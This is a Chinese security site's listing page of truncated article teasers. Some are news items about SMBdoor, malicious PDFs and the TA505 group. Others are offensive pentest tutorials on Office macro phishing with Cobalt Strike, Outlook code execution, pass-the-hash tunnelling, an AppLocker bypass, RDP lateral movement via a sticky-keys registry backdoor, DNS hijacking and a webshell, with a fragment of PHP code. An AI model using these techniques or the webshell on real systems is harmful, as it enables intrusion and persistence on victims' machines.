研究人员根据泄漏NSA恶意软件创建新后门
研究人员根据泄漏NSA恶意软件创建新后门
2019-04-25 08:50:36  
受2017年春由The Shadow Brokers在线泄露的NSA恶意软件“DoublePulsar”和“DarkPulsar”的启发,美国网络安全公司RiskSence研究人员Sean Dillon(@ zerosum0x0)创建了一个名为“SMBdoor”的恶意软件概念验证后门,突出了防病毒产品没有关注的操作系统部分。SMBdoor被设计成了一个Windows内核驱动程序,一旦安装在PC上,
黑客 工具 资讯 查看数 8835,评论数 0
PDF:恶意软件和欺诈的首选工具
PDF:恶意软件和欺诈的首选工具
2019-04-24 06:38:24  
根据SonicWall Capture Labs威胁研究人员的一份报告,欺诈性PDF文件大量增加。此活动利用收件人对PDF文件的信任,收件人一般将PDF认为是“安全”的文件格式,使用广泛。SonicWall总裁兼首席执行官Bill Conner说:“越来越多的电子邮件、Office文档和现在的PDF文件是网络环境中恶意软件和欺诈的首选工具。”PDF攻击活动概况去年一整年,研究人员的Capture
工具 资讯 查看数 9822,评论数 0
威胁组织TA505使用合法的远程管理工具进行网络攻击
威胁组织TA505使用合法的远程管理工具进行网络攻击
2019-04-22 06:37:42  
安全研究人员此前已经发现TA505是一个由俄语成员组成的网络犯罪组织,他们利用一种合法的远程管理工具——“远程操纵系统(RMS)”,针对美国、智利、印度、意大利、马拉维、巴基斯坦和韩国的主要零售商和金融机构进行网络攻击。威胁组织TA505TA505组织由Proofpoint在2017年9月首次命名,其相关活动可以追溯到2014年。该组织主要针对银行金融机构,采用大规模发送恶意邮件的方式进行攻击,并
工具 资讯 查看数 9098,评论数 0
office常规钓鱼手法
office常规钓鱼手法
2018-09-11 15:33:40  
一、宏 在选项处->自定义功能区添加宏 STEP 1   STEP 2 STEP 3 点击创建->Microsoft Word对象->双击 This Document 使用cobaltstrike生成vba payload 点击启用内容 成功上线 二、dde ste
工具 技术控 查看数 13893,评论数 0
outlook代码执行
outlook代码执行
2018-09-11 15:28:04  
前提-获取对方帐号密码,并使用outlook客户端登录 测试环境: 客户端 outlook 2013 登录邮箱后进行设置 inbox->右键属性   home page 设置payload地址,将show home page by default for this folder勾上   test.html内容
工具 查看数 24259,评论数 0
pass the hash & pass the ticket
pass the hash & pass the ticket
2018-09-11 15:26:50  
一、pass the hash 环境如下: 域控:192.168.3.88 普通域用户电脑:192.168.3.50 渗透测试人员:外网IP 前提:已经获取到域管 hash。 通过socks隧道传递流量 本机执行 ./ew_for_linux64 -s rcsocks -l 1008 -e 888 普通域用户电脑执行 ew_for_Win
工具 技术控 查看数 10604,评论数 0
bypass AppLocker on the exe
bypass AppLocker on the exe
2018-09-11 15:15:33  
一、配置applocker 启动AppIDSvc服务 gpedit.msc->计算机配置->windows设置->安全设置->应用程序控制策略->AppLocker 点击可执行程序,创建默认规则   除了上图中的的路径外的程序,其他路径的程序都无法执行。 当前用户属于users组用户 shel
工具 技术控 查看数 9453,评论数 0
不使用eval、assert制作webshell
不使用eval、assert制作webshell
2018-09-11 15:07:32  
1、include函数 实现思路:将POST过来的参数写入到一个文本里,再去包含文本实现代码执行 <?php @$pwd=$_POST['pwd']; $include_file='code.txt'; if(isset($pwd)){ file_put_contents($include_file,'<?php '.$pwd); inclu
工具 技术控 查看数 24344,评论数 0
通过RDP协议横向移动
通过RDP协议横向移动
2018-09-11 15:02:19  
背景: 想去目标机器上抓chrome密码,但是用户的ntlm hash解不开,导致不能去解密chrome密码,3389端口是开着的,win7机器默认不允许多用户登录,贸然上去怕被用户发觉。 思路一: 445端口开启可以通过wmic执行命令替换快捷键 快捷键后门 osk.exe reg add "HKLMSOFTWAREMicrosoftWindows
工具 技术控 查看数 10770,评论数 0
劫持DNS通过流量植入木马
劫持DNS通过流量植入木马
2018-09-11 14:48:25  
前言 很多时候对目标进行渗透时一般会从web、网络设备、针对性钓鱼这三个方向入手。假设我们控制了目标网络中的一台网络设备,如路由器,内网用户流量会从这个地方经过我们怎么获取其权限呢 ? 这种时候可以在路由器上抓包分析用户流量,比如启动xshell、notepad++等软件时发送的更新请求包,然后我们替换软件更新的http响应包达到植入木马目的。 分析流量一般用tcpdump,如果
工具 技术控 查看数 10699,评论数 0
  • 最新评论
/css.php
正在加载中...